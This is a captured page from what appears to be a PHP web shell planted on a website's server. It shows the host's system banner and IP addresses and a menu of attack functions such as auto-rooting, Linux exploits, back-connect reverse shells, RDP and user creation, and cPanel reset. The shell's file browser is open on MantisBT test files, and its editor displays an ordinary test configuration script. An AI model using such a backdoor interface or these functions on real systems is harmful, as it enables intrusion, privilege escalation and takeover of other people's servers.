Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mantis /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
Mantis
[ DIR ]
drwxr-xr-x
soap
[ DIR ]
drwxr-xr-x
AllTests.php
1.21
KB
-rw-r--r--
TestConfig.php
1.81
KB
-rw-r--r--
bootstrap.php.sample
161
B
-rw-r--r--
test.php
1.14
KB
-rw-r--r--
test_config_get_set.php
1.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TestConfig.php
<?php # Mantis - a php based bugtracking system # Mantis is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # Mantis is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Mantis. If not, see <http://www.gnu.org/licenses/>. /** * @package Tests * @subpackage UnitTests * @copyright Copyright (C) 2000 - 2002 Kenzaburo Ito - kenito@300baud.org * @copyright Copyright (C) 2002 - 2013 MantisBT Team - mantisbt-dev@lists.sourceforge.net * @link http://www.mantisbt.org */ /* * Start output buffering */ ob_start(); /* * Include PHPUnit dependencies ; insure compatibility with 3.5 and 3.6 */ @include_once 'PHPUnit/Framework.php'; /* * Set error reporting to the level to which Zend Framework code must comply. */ error_reporting( E_ALL | E_STRICT ); /* * Determine the root, library, and tests directories of the framework * distribution. */ $mantisRoot = dirname(__FILE__) . '/..'; $mantisCore = "$mantisRoot/core"; $mantisLibrary = "$mantisRoot/library"; $mantisClasses = "$mantisRoot/core/classes"; $mantisTests = "$mantisRoot/tests"; /* * Prepend the application/ and tests/ directories to the * include_path. */ $path = array( $mantisCore, $mantisLibrary, $mantisClasses, get_include_path() ); set_include_path( implode( PATH_SEPARATOR, $path ) ); /* * Unset global variables that are no longer needed. */ unset($mantisRoot, $mantisLibrary, $mantisTests, $path);
Close